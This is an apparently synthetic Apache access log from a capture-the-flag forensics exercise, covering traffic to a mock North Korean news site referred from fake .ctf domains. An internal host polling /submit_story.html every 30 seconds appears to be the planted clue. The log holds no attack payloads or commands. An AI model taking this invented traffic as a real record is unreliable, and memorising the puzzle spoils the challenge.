Trident/7.0; rv:11.0) like Gecko" +36.249.219.29 - - [23/Jul/2020:11:34:23 -0500] "POST /en/quality-waterproof-liquid-made/ HTTP/1.0" 200 14543 "-" "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" +189.183.210.213 - - [23/Jul/2020:11:34:26 -0500] "GET / HTTP/1.1" 200 11736 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +251.86.2.3 - - [23/Jul/2020:11:34:29 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 13784 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +158.12.233.5 - - [23/Jul/2020:11:34:30 -0500] "POST /tablet-computer-popular-in-dprk/ HTTP/1.1" 400 10532 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +220.114.164.11 - - [23/Jul/2020:11:34:34 -0500] "POST /en/sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 304 10939 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +177.17.36.181 - - [23/Jul/2020:11:34:38 -0500] "GET /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.0" 200 7625 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +91.43.52.54 - - [23/Jul/2020:11:34:41 -0500] "GET /dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 200 7128 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +247.22.51.101 - - [23/Jul/2020:11:34:45 -0500] "POST /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 5944 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +197.138.87.156 - - [23/Jul/2020:11:34:47 -0500] "POST /en/new-kind-of-flowerpot-invented/ HTTP/1.1" 200 8490 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53" +221.251.217.131 - - [23/Jul/2020:11:34:49 -0500] "GET /en/dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 6906 "http://www.google.ctf" "Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +33.112.176.97 - - [23/Jul/2020:11:34:53 -0500] "POST /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.0" 200 4762 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +192.168.51.66 - - [23/Jul/2020:11:34:54 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +210.152.206.228 - - [23/Jul/2020:11:34:56 -0500] "POST /en/tablet-computer-popular-in-dprk/ HTTP/1.1" 200 6486 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +181.234.95.19 - - [23/Jul/2020:11:34:59 -0500] "GET / HTTP/1.1" 200 8232 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +77.193.36.28 - - [23/Jul/2020:11:35:00 -0500] "GET / HTTP/1.1" 304 7524 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +177.253.187.35 - - [23/Jul/2020:11:35:03 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.0" 301 9447 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +24.26.231.243 - - [23/Jul/2020:11:35:05 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.0" 200 12323 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +149.145.254.81 - - [23/Jul/2020:11:35:07 -0500] "GET /first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 200 10364 "-" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" +145.169.40.83 - - [23/Jul/2020:11:35:08 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.0" 200 13294 "-" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +185.253.28.162 - - [23/Jul/2020:11:35:11 -0500] "GET / HTTP/1.1" 200 8712 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +58.89.37.10 - - [23/Jul/2020:11:35:14 -0500] "GET /dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 500 2214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4" +96.34.157.152 - - [23/Jul/2020:11:35:15 -0500] "GET /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 11823 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +42.247.184.45 - - [23/Jul/2020:11:35:18 -0500] "GET /en/ HTTP/1.0" 200 13420 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +194.148.38.153 - - [23/Jul/2020:11:35:20 -0500] "GET /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 403 10551 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +133.33.59.250 - - [23/Jul/2020:11:35:23 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 6641 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:35:24 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +105.236.94.181 - - [23/Jul/2020:11:35:26 -0500] "GET /en/greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 404 8268 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +68.135.102.227 - - [23/Jul/2020:11:35:30 -0500] "GET /en/mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 2350 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +125.112.225.88 - - [23/Jul/2020:11:35:32 -0500] "GET /new-kind-of-flowerpot-invented/ HTTP/1.1" 200 14674 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +183.140.149.92 - - [23/Jul/2020:11:35:33 -0500] "GET / HTTP/1.1" 301 10502 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +182.232.79.60 - - [23/Jul/2020:11:35:35 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 3227 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201" +217.94.203.69 - - [23/Jul/2020:11:35:38 -0500] "GET / HTTP/1.1" 200 11373 "http://www.google.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0" +182.108.34.33 - - [23/Jul/2020:11:35:41 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 13375 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +49.179.178.88 - - [23/Jul/2020:11:35:45 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 304 9972 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +18.238.143.152 - - [23/Jul/2020:11:35:46 -0500] "GET /en/ HTTP/1.1" 403 5011 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +134.29.109.45 - - [23/Jul/2020:11:35:49 -0500] "POST /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 5861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +3.197.53.197 - - [23/Jul/2020:11:35:50 -0500] "POST /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 9032 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +154.228.127.179 - - [23/Jul/2020:11:35:53 -0500] "POST /en/many-medical-scientific-achievements-made/ HTTP/1.1" 200 7208 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" +192.168.51.66 - - [23/Jul/2020:11:35:54 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +177.225.216.150 - - [23/Jul/2020:11:35:55 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 6784 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +200.252.228.119 - - [23/Jul/2020:11:35:59 -0500] "GET /nuke-the-chinese/ HTTP/1.1" 304 4298 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" +34.44.183.208 - - [23/Jul/2020:11:36:02 -0500] "GET /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 9926 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +58.117.191.169 - - [23/Jul/2020:11:36:05 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.0" 200 12547 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" +56.247.4.19 - - [23/Jul/2020:11:36:06 -0500] "GET /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 11466 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +132.251.23.207 - - [23/Jul/2020:11:36:07 -0500] "GET /en/dancing-parties-held/ HTTP/1.1" 200 13191 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +36.57.116.155 - - [23/Jul/2020:11:36:08 -0500] "GET /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 13072 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +91.212.14.158 - - [23/Jul/2020:11:36:10 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 3028 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" +184.146.12.133 - - [23/Jul/2020:11:36:11 -0500] "GET /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 400 10291 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +113.207.154.125 - - [23/Jul/2020:11:36:14 -0500] "GET / HTTP/1.1" 400 9048 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +105.81.131.252 - - [23/Jul/2020:11:36:18 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.0" 200 13312 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +64.17.137.19 - - [23/Jul/2020:11:36:22 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 4248 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:36:24 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +247.70.121.147 - - [23/Jul/2020:11:36:26 -0500] "POST /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 301 13462 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +194.35.159.137 - - [23/Jul/2020:11:36:27 -0500] "GET /deep-pan-or-classic/ HTTP/1.1" 200 10284 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +120.168.255.116 - - [23/Jul/2020:11:36:31 -0500] "GET /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 9498 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +170.60.185.239 - - [23/Jul/2020:11:36:33 -0500] "GET /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 200 2650 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +101.247.68.25 - - [23/Jul/2020:11:36:35 -0500] "POST /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 10675 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +248.69.189.4 - - [23/Jul/2020:11:36:37 -0500] "GET /en/ HTTP/1.1" 200 6799 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +155.109.252.47 - - [23/Jul/2020:11:36:38 -0500] "GET / HTTP/1.1" 200 2997 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +51.251.4.45 - - [23/Jul/2020:11:36:41 -0500] "GET /en/kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.1" 200 5796 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +243.131.216.43 - - [23/Jul/2020:11:36:43 -0500] "GET /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 7023 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201" +51.45.214.179 - - [23/Jul/2020:11:36:44 -0500] "POST / HTTP/1.0" 200 9175 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +244.69.189.174 - - [23/Jul/2020:11:36:45 -0500] "GET /latest-rocket/ HTTP/1.1" 200 13970 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +205.79.183.221 - - [23/Jul/2020:11:36:46 -0500] "GET /nuke-the-chinese/ HTTP/1.1" 200 13745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +217.217.138.137 - - [23/Jul/2020:11:36:48 -0500] "GET /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 14356 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +167.27.196.67 - - [23/Jul/2020:11:36:52 -0500] "GET / HTTP/1.1" 304 2227 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:36:54 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +43.195.190.212 - - [23/Jul/2020:11:36:56 -0500] "POST /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 2636 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806" +132.37.98.27 - - [23/Jul/2020:11:36:57 -0500] "GET /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 6179 "http://www.yahoo.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +112.232.105.17 - - [23/Jul/2020:11:37:01 -0500] "GET /en/ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 200 13269 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +240.242.62.169 - - [23/Jul/2020:11:37:02 -0500] "POST /en/kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.0" 200 10992 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +20.183.18.2 - - [23/Jul/2020:11:37:05 -0500] "GET /en/mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.0" 200 9251 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +227.138.18.245 - - [23/Jul/2020:11:37:07 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 301 3257 "http://www.yahoo.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +13.51.210.151 - - [23/Jul/2020:11:37:08 -0500] "GET / HTTP/1.1" 200 12625 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +9.219.151.159 - - [23/Jul/2020:11:37:10 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 8487 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +32.158.106.72 - - [23/Jul/2020:11:37:13 -0500] "GET /new-national-record-set-in-archery/ HTTP/1.1" 200 10775 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +135.183.225.220 - - [23/Jul/2020:11:37:15 -0500] "POST /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 301 4703 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +193.53.173.143 - - [23/Jul/2020:11:37:17 -0500] "POST /deep-pan-or-classic/ HTTP/1.0" 200 5459 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +34.166.144.88 - - [23/Jul/2020:11:37:19 -0500] "GET /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 12622 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" +253.54.248.221 - - [23/Jul/2020:11:37:23 -0500] "GET /en/deep-pan-or-classic/ HTTP/1.0" 500 10537 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:37:24 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +182.65.136.107 - - [23/Jul/2020:11:37:25 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 3632 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +43.24.17.219 - - [23/Jul/2020:11:37:26 -0500] "GET / HTTP/1.1" 200 2761 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +37.113.107.141 - - [23/Jul/2020:11:37:27 -0500] "GET /kumdang-2-injection-manufactured/ HTTP/1.1" 200 3363 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +218.255.240.105 - - [23/Jul/2020:11:37:29 -0500] "POST /dancing-parties-held/ HTTP/1.1" 200 9823 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +40.85.101.238 - - [23/Jul/2020:11:37:33 -0500] "GET / HTTP/1.1" 200 6515 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +79.185.216.72 - - [23/Jul/2020:11:37:35 -0500] "POST /en/2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 7806 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +80.119.137.136 - - [23/Jul/2020:11:37:38 -0500] "GET /en/deep-pan-or-classic/ HTTP/1.1" 200 10426 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201" +62.167.184.41 - - [23/Jul/2020:11:37:40 -0500] "GET /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 4774 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +147.47.9.97 - - [23/Jul/2020:11:37:44 -0500] "GET /royal-blood-fresh-elixir-of-life/ HTTP/1.0" 200 11228 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +160.255.190.37 - - [23/Jul/2020:11:37:48 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 8583 "http://www.google.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +135.9.234.59 - - [23/Jul/2020:11:37:49 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 8723 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:30.0) Gecko/20100101 Firefox/30.0" +85.229.245.230 - - [23/Jul/2020:11:37:50 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 10893 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +4.101.134.36 - - [23/Jul/2020:11:37:52 -0500] "GET /en/ HTTP/1.1" 200 2275 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +192.168.51.66 - - [23/Jul/2020:11:37:54 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +53.218.10.69 - - [23/Jul/2020:11:37:56 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 13185 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100 Safari/537.36" +12.254.147.75 - - [23/Jul/2020:11:37:58 -0500] "GET /en/ HTTP/1.1" 200 14662 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +14.142.17.246 - - [23/Jul/2020:11:38:00 -0500] "GET /deep-pan-or-classic/ HTTP/1.1" 200 5615 "-" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" +78.5.28.183 - - [23/Jul/2020:11:38:04 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 4716 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +221.93.177.185 - - [23/Jul/2020:11:38:06 -0500] "POST /en/kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 7747 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +186.176.4.69 - - [23/Jul/2020:11:38:08 -0500] "GET / HTTP/1.1" 200 2532 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806" +55.59.167.7 - - [23/Jul/2020:11:38:11 -0500] "GET /new-books-published-in-dprk/ HTTP/1.1" 200 13278 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +207.5.42.51 - - [23/Jul/2020:11:38:13 -0500] "GET /new-national-record-set-in-archery/ HTTP/1.1" 200 3225 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +221.21.194.177 - - [23/Jul/2020:11:38:16 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 500 14386 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +36.159.106.178 - - [23/Jul/2020:11:38:20 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ 